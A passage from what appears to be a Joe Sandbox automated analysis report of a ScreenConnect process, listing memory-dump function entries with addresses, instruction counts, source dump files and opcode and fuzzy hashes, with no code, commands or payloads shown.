                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3277910641.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_143d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                          • Instruction ID: c6282465b9c47d151c39c5115e35d1f5da76f8aa43f6de686797261656ccc582
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11DF76804280CFDB13CF54D9C4B16BF72FB88314F24C5AAD9090B266C336D45ACBA2
                                                                                                                                                                                                                                          Function 01F48A98 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 406b6cb6c1df343b6587729fd63fda66a61b818a3366fbd4cf897b26a6a70378
                                                                                                                                                                                                                                          • Instruction ID: 7bca3916c017aa000c103215401bbddfb87a82f9ff90ed359c57e9d9634d5cb7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 406b6cb6c1df343b6587729fd63fda66a61b818a3366fbd4cf897b26a6a70378
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13117036A001069FCB01CF98D9909CDBBB1FF45314B1581AAD505BF125D632AD0BCBA0
                                                                                                                                                                                                                                          Function 01F491D8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e49fec56153f02ebb08513518b73b3e09a75dab3850edf80b67415a67dba7f1f
                                                                                                                                                                                                                                          • Instruction ID: fdf1a68266382ee2889b8b2a36feb2ceab3c13eb4e05f698ba76d2e9cb0a65f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e49fec56153f02ebb08513518b73b3e09a75dab3850edf80b67415a67dba7f1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE116171F40205AFDB25CA6DC800AABBBF6FFC8304F14856AD554D7254D7B29A41CB91
                                                                                                                                                                                                                                          Function 044D5230 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9c601076850adfbfb6c0df4ceeabfce8b219cb049916082b1b23847e34f852eb
                                                                                                                                                                                                                                          • Instruction ID: 01e02c14c51de8e5f73ba777a82381b04241dedcb9890bd95840a1f5cb8e2526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c601076850adfbfb6c0df4ceeabfce8b219cb049916082b1b23847e34f852eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 470184357006129F8B20DF59D49451BB7E6BB8C6543144059D95A8B314DF30FD02CBC1
                                                                                                                                                                                                                                          Function 01F4CBE0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27e4665665ce0f69fb8008ade2ba2136ae661d27ef393efc7af3ddd1d0303f46
                                                                                                                                                                                                                                          • Instruction ID: 203da8d320784c7ae1a1f24453ada4a58915d058fbcb1a4a1905c8016ac31bf1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27e4665665ce0f69fb8008ade2ba2136ae661d27ef393efc7af3ddd1d0303f46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21111C31E402198FDF18DBA8D961AEDBBB1EF89310F000469D106BB374DB791D44CBA4
                                                                                                                                                                                                                                          Function 01F4CBD0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f2689f76c1f5eae4fe572e6bed8475326b65a7737fe07c85d8261dd6d095779c
                                                                                                                                                                                                                                          • Instruction ID: f94a10051654d8ab9609e9e3e39353a256a4ebc436934386f5da84e38fc3517d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2689f76c1f5eae4fe572e6bed8475326b65a7737fe07c85d8261dd6d095779c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61113C71D412188FDF19DBA8D9A5BDDBBB1EF48310F00142AD102BB2A4DA791D41CBA5
                                                                                                                                                                                                                                          Function 01F48BB5 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d8c393ebd51334ea1ccd1e43c4ee6bad1913199e6d7eb48208690b67c0f0523
                                                                                                                                                                                                                                          • Instruction ID: 548534b7d06950d20db275d4fe014b4eff8ea91c0e0fa37526cb1c9546cda186
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d8c393ebd51334ea1ccd1e43c4ee6bad1913199e6d7eb48208690b67c0f0523
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF115832A0004ACFCB05DFA8D9908DCBFB2FF84354B18C559D105AB12AD736E946CBA0
                                                                                                                                                                                                                                          Function 01F4FA00 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 713ca929cda277d9111b3ee5c4b74e417f7b953a7f85275d31b923d863dec4d2
                                                                                                                                                                                                                                          • Instruction ID: ff210fdf7854b7f83593187df3e031f02553e98588c59b690f85b34aab5c0073
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 713ca929cda277d9111b3ee5c4b74e417f7b953a7f85275d31b923d863dec4d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3501F97060E7845FC3139B2E6894856BFA9DF83110309849BD188CB163D915A809C7A2
                                                                                                                                                                                                                                          Function 01F48B50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 68fe014345f471ee45698e0c4f3a3b2c52c006586544686e0c340e6accac9354
                                                                                                                                                                                                                                          • Instruction ID: e9bafb2d492e96c612ec08dea811c6b2de9901a890cb90b7187049832e01d21c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68fe014345f471ee45698e0c4f3a3b2c52c006586544686e0c340e6accac9354
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13018C32E0014A9BDB08EFA9D8504CDBFB2EF89354F05842AD445BB215DB316D47CBA0
                                                                                                                                                                                                                                          Function 01F48AD0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f9bfce22e4ba849f7456369d0027612213a42592cfcdd1fe91b9297188a30396
                                                                                                                                                                                                                                          • Instruction ID: a76b3cefa1715acf56df105677c7f89616e6142544da0d3c0a76e3b05e596dc6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9bfce22e4ba849f7456369d0027612213a42592cfcdd1fe91b9297188a30396
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60111235A0010A9FCF00DFA8D9409DEBBF5FF49314B10856AD509BB264D772AE0ACB90
                                                                                                                                                                                                                                          Function 044D4AD8 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6714e861ae1697bbb35e34a7761e1bccbdce5ba7246a011f2e89173364951425
                                                                                                                                                                                                                                          • Instruction ID: 029f0db3ebf544aa0255ba34d6af31ace4f0bb568485116cbe4048d22b7c5316
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6714e861ae1697bbb35e34a7761e1bccbdce5ba7246a011f2e89173364951425
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101F7713002011BD7057B7A989191EF697EFD4520714893ED10A9F338EE35FC098791
                                                                                                                                                                                                                                          Function 01F4646F Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c01fc521bc62430020e2741920dee288ddb444735fb14aacd39f8b3d5d839638
                                                                                                                                                                                                                                          • Instruction ID: 8b9e989156e87e7a0afa176e5e068f7b7d5e3c776afe5c1df57ee174889bb9e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01fc521bc62430020e2741920dee288ddb444735fb14aacd39f8b3d5d839638
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 070126713053811FC7018BA8E88488ABFE9EF8A674700416BE008CF3A6E675DD07C7A1
                                                                                                                                                                                                                                          Function 01F4F640 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 648863a963bd81cac9d2b70483eabde7bef01d46eaf036d9ac1eea9e785284a5
                                                                                                                                                                                                                                          • Instruction ID: 17fc545f4f39897d0d505bb68c363e4ba68a657c0cac790bee088466510ac7ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 648863a963bd81cac9d2b70483eabde7bef01d46eaf036d9ac1eea9e785284a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF014E726082441FDB065F689C508DF3FB6EF85270B08006BE909CB253CA398816C3F1
                                                                                                                                                                                                                                          Function 01F4A9E8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6f663b28e132d3ba9f98fbd780436e73447daf53169cd4595d3c6ba1b0a41b6d
                                                                                                                                                                                                                                          • Instruction ID: 66bc1a4e4d7e92cd73ff67bcd2e598ea3fc0210e8e346fc0de5971838578abaa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f663b28e132d3ba9f98fbd780436e73447daf53169cd4595d3c6ba1b0a41b6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5012671F402199B8F098A6DA8444AFFBEDFBC826431449AFD406DB301EBB2DC0687D0
                                                                                                                                                                                                                                          Function 044D4672 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d42113814b8ee2ebc06e06260dd6591c9768970291be663974ea49917e26d512
                                                                                                                                                                                                                                          • Instruction ID: 656ecdad16b4555b07c38553cb78d915ce263cd5723c8e3497d13a88bb416cb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d42113814b8ee2ebc06e06260dd6591c9768970291be663974ea49917e26d512
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8601A471B0120A5FCB10DEA8DD509EFBBF5EF85214B008137D909D3601E634AA028B91
                                                                                                                                                                                                                                          Function 0143D006 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3277910641.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_143d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 775052a0304b2ab08dfa05f0879a54010dc7a2e099190c6b469f455eaacdf6dd
                                                                                                                                                                                                                                          • Instruction ID: 0cd193cdd61358841bd2d630f2a7b88886db0023c1b078302885f27fb3779f41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 775052a0304b2ab08dfa05f0879a54010dc7a2e099190c6b469f455eaacdf6dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F01407240D3C09FD7138B258894652BFB4EF47624F19C1DBD9888F2A3C2795849C772
                                                                                                                                                                                                                                          Function 0143D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3277910641.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_143d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: df04282d45bc696d736c26317bb2ecaaf19e90f7505044f6d0d11b9f94018f69
                                                                                                                                                                                                                                          • Instruction ID: a2c5b77357b1453534957aa713e5224e309c2be34e63edbcc60506dac4e5b556
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df04282d45bc696d736c26317bb2ecaaf19e90f7505044f6d0d11b9f94018f69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F801FCB180430099E7104A59CC84B57FFA8EFC9768F58C427ED581B297C2799402CAB1
                                                                                                                                                                                                                                          Function 044D4680 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 04766dc792a0d029b1ed48e21c03beddcb3b2c6ff45d0b52a1f482bb9db6d6a8
                                                                                                                                                                                                                                          • Instruction ID: 823e63c2b1cd53501b4190128a5376c6fc168c7c0526d8ac65f62c4b550c529c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04766dc792a0d029b1ed48e21c03beddcb3b2c6ff45d0b52a1f482bb9db6d6a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D011D76B0011A9B8F14DA99D8149EFBBB9EB84225B008537E919E7204E734AA158BE1
                                                                                                                                                                                                                                          Function 044D4D31 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a6fbbc59a89f4e4b9a6f0a5a68092d1d53a585a53e29ea3ee2ebb66181e4c6ec
                                                                                                                                                                                                                                          • Instruction ID: c9f64800f3cf73137a5cbe9494752ebcb74810a8767f579c943c17f6f3e8b684
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fbbc59a89f4e4b9a6f0a5a68092d1d53a585a53e29ea3ee2ebb66181e4c6ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF0C8767002005BE714DB6AA45048EFBE9EFC5214314C47FD409CF226EA32EC078BD0
                                                                                                                                                                                                                                          Function 01F4FF50 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a89b9e8d914037761c7bd8959310ffdf77aa4b569b8a300575996e155c3c01de
                                                                                                                                                                                                                                          • Instruction ID: 3af24f0900110b680391363ac7fad1c657ea8718ad5a2f34a7d612fc44997fd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89b9e8d914037761c7bd8959310ffdf77aa4b569b8a300575996e155c3c01de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A901D1353052055FC754DF6DE880D8ABFA9EF852A4314862AE458CB3A6DB71ED0AC7D0
                                                                                                                                                                                                                                          Function 044D5730 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23effa1f18572b06de0a5a645b6d7746817cedd7bec4bb894d660a318d28a59b
                                                                                                                                                                                                                                          • Instruction ID: 1dac1099bdeb448574f111e22fa08aa03ceebe91a7b98d0417825c40289dd623
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23effa1f18572b06de0a5a645b6d7746817cedd7bec4bb894d660a318d28a59b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F03AB590A3899FC792DBB8C8564C9BFF4EF06220B4581DBD449DB613E3704A02CB92
                                                                                                                                                                                                                                          Function 01F48B60 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35162b34825f005f460cff44318904762213c10ded81538d298c6dbbc8ed653c
                                                                                                                                                                                                                                          • Instruction ID: 712577fdb5cf58092155e0bafd26890f11b20471c46cffa59ac9be69525b8fe0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35162b34825f005f460cff44318904762213c10ded81538d298c6dbbc8ed653c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1012832D0015ADBCF09DFA9E9548CDBFB6EF89714F05842AD505BB264DB316906CBA0
                                                                                                                                                                                                                                          Function 01F4E280 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17f56ccffd35f3c59df0172977d18689e29728a431377346746d149e2c705d2d
                                                                                                                                                                                                                                          • Instruction ID: 61a998e2c5df3a129128ccf4e6d76f0058e42ed1a4601ea5c35453701e45ce7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17f56ccffd35f3c59df0172977d18689e29728a431377346746d149e2c705d2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0E771D011099FCB84DFA8C8856DEBBF1EF48220B148066D818E7210E236AA02CBC1
                                                                                                                                                                                                                                          Function 01F4A9C1 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aa8c86fff7ea8acc024ef12e060abd1a252090691c0af203b27ad6233a8e2f7b
                                                                                                                                                                                                                                          • Instruction ID: 446b1987873ac8b1f1bbc17d0eccf06ea85d4f347f1035f54dd94155581a0626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa8c86fff7ea8acc024ef12e060abd1a252090691c0af203b27ad6233a8e2f7b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDF0826690D3D05FD317067D68648A6BFB8D9875A831E42DBD48DCB153E4059C0AC7A2
                                                                                                                                                                                                                                          Function 06351EFF Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
